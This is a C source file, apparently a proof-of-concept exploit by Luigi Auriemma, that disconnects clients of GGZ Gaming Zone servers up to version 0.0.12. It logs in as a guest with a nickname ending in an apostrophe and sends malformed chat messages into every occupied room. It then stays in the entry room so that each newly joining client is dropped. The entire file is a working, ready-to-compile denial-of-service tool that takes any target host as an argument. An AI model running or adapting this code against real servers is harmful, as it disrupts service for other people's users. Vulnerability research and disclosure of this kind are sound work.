/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define stristr strcasestr
    #define stricmp strcasecmp
#endif



#define VER         "0.1"
#define PORT        5688
#define BUFFSZ      0xffff
#define IDEXP       128             // max rooms to exploit
#define QUERYSZ     4096
#define JOIN        "<?xml version='1.0' encoding='UTF-8'?>\n"      \
                    "<SESSION>\n"                                   \
                    "<LANGUAGE>en_US</LANGUAGE>\n"                  \
                    "<LOGIN TYPE='guest'>\n"    /* first, normal */ \
                    "<NAME>%s</NAME>\n"                             \
                    /* "<PASSWORD></PASSWORD>\n"                 */ \
                    /* "<EMAIL></EMAIL>\n"                       */ \
                    "</LOGIN>\n"
#define LIST        "<LIST TYPE='room' FULL='true'/>\n"             \
                    "<LIST TYPE='game' FULL='true'/>\n"
#define ENTER       "<ENTER ROOM='%d'/>\n"
#define CHAT        "<CHAT TYPE='normal'><![CDATA[%s]]></CHAT>\n"
#define PONG        "<PONG/>\n"



void get_ggz_room(u_char *data, int *id, u_char **name, int *game, int *players);
int recv_xml(int sd, u_char *data, int size, u_char **par, u_char **val);
int create_rand_string(u_char *data, int len, u_int *seed, int randlen);
u_int resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  sockaddr_in peer;
    u_int   seed;
    int     sd,
            i,
            len,
            id,
            game,
            players,
            idnum,
            idexp[IDEXP];
    u_short port = PORT;
    u_char  nick[17],
            query[QUERYSZ + 1],
            *buff,
            *name,
            *par,
            *val;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    srand(time(NULL));
    setbuf(stdout, NULL);

    fputs("\n"
        "GGZ <= 0.0.12 clients disconnector "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%hu)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    if(argc > 2) port = atoi(argv[2]);
    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), port);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();

    printf("- connect...");
    if(connect(sd, (struct sockaddr *)&peer, sizeof(peer))
      < 0) std_err();
    printf(" done\n");

    seed = time(NULL);
    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    printf("- receive header\n");
    while((len = recv_xml(sd, buff, BUFFSZ, &par, &val)) > 0) {
        printf(" - %s: %s\n", par, val);
        if(!stricmp(par, "/SERVER")) break;
    }

    printf("- join as guest with a malformed nick (char \')\n");
    len = create_rand_string(nick, sizeof(nick), &seed, 1);
    nick[len - 1] = '\'';               // malformed, inside or at the end is the same
    len = sprintf(buff, JOIN, nick);
    if(send(sd, buff, len, 0) < 0) std_err();

    while((len = recv_xml(sd, buff, BUFFSZ, &par, &val)) > 0) {
        if(!stricmp(par, "RESULT") && stristr(val, "'ok'")) {
            printf("- player accepted\n");
            break;
        }
        if(!stricmp(par, "/RESULT")) break;
    }

    len = sprintf(buff, LIST);
    if(send(sd, buff, len, 0) < 0) std_err();

    idnum = 0;
    printf("- Rooms:\n");
    while((len = recv_xml(sd, buff, BUFFSZ, &par, &val)) > 0) {
        if(!stricmp(par, "ROOM")) {
            get_ggz_room(val, &id, &name, &game, &players);
            printf("  %2d: %-30s   (%d players)\n", id, name, players);
            if(players && (idnum < IDEXP)) {
                idexp[idnum] = id;
                idnum++;
            }
        }
        if(!stricmp(par, "/RESULT")) break;
    }

    if(!idnum) {
        printf("- all the rooms are empty... no clients no party\n");
        goto quit;
    }

    printf("\n"
        "- now I enter in each one of the %d rooms containing players and send the\n"
        "  malformed message:\n", idnum);

    for(i = 0; i < idnum; i++) {
        printf("    room %d\n", idexp[i]);

        len = sprintf(buff, ENTER, idexp[i]);
        if(send(sd, buff, len, 0) < 0) std_err();

        create_rand_string(query, sizeof(query), &seed, 0);
        len = sprintf(buff, CHAT, query);
        if(send(sd, buff, len, 0) < 0) std_err();
    }

quit:
    printf("\n"
        "- now I stay in the Entry Room so any client which will join the server will be\n"
        "  disconnected immediately (CTRL-C to break)\n");

    len = sprintf(buff, ENTER, 0);
    if(send(sd, buff, len, 0) < 0) std_err();
    while((len = recv_xml(sd, buff, BUFFSZ, &par, &val)) > 0) {
        if(!stricmp(par, "PING/")) {
            len = sprintf(buff, PONG);
            if(send(sd, buff, len, 0) < 0) std_err();
        }
        if(stristr(val, "' TYPE='")) printf("    %s\n", val);
    }

//    len = sprintf(buff, "/SESSION");
//    if(send(sd, buff, len, 0) < 0) std_err();

    close(sd);
    printf("- you have been disconnected\n");
    return(0);
}



void get_ggz_room(u_char *data, int *id, u_char **name, int *game, int *players) {
    u_char  *p;

    // everything is fixed so the job is easy
    p = strstr(data, "ID='");
    if(p) sscanf(p + 4, "%d", id);

    p = strstr(data, "' GAME='");
    if(p) sscanf(p + 8, "%d", game);

    p = strstr(data, "' PLAYERS='");
    if(p) sscanf(p + 11, "%d", players);

    p = strstr(data, "' NAME='");
    if(p) {
        p += 8;
        *name = p;
        p = strchr(p, '\'');
        if(p) *p = 0;
    }
}



    // lame, just for PoC
int recv_xml(int sd, u_char *data, int size, u_char **par, u_char **val) {
    u_char  *p,
            *s,
            *e,
            *limit;

    *par = "";
    *val = "";

    limit = data + size - 1;
    for(p = data; p < limit; p++) {
        if(recv(sd, p, 1, 0) <= 0) return(-1);
        if(*p == '>') break;
    }
    *p++ = 0;

    s = strchr(data, '<');
    if(!s) goto quit;
    s++;
    *par = s;

    for(e = s; *e && (*e > ' '); e++);
    if(*e) {
        *e = 0;
        *val = e + 1;
    }

quit:
    return(p - data);
}



int create_rand_string(u_char *data, int len, u_int *seed, int randlen) {
    u_int   rnd;
    u_char  *p;
    const static u_char table[] =
                "0123456789"
                "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
                "abcdefghijklmnopqrstuvwxyz";

    rnd = *seed;
    p   = data;

    if(randlen) {
        len = rnd % len;
        if(len < 3) len = 3;
    }

    while(--len) {
        rnd = (rnd * 0x343FD) + 0x269EC3;
        rnd >>= 3;
        *p++ = table[rnd % (sizeof(table) - 1)];
    }
    *p = 0;

    *seed = rnd;
    return(p - data);
}



u_int resolv(char *host) {
    struct  hostent *hp;
    u_int   host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_int *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


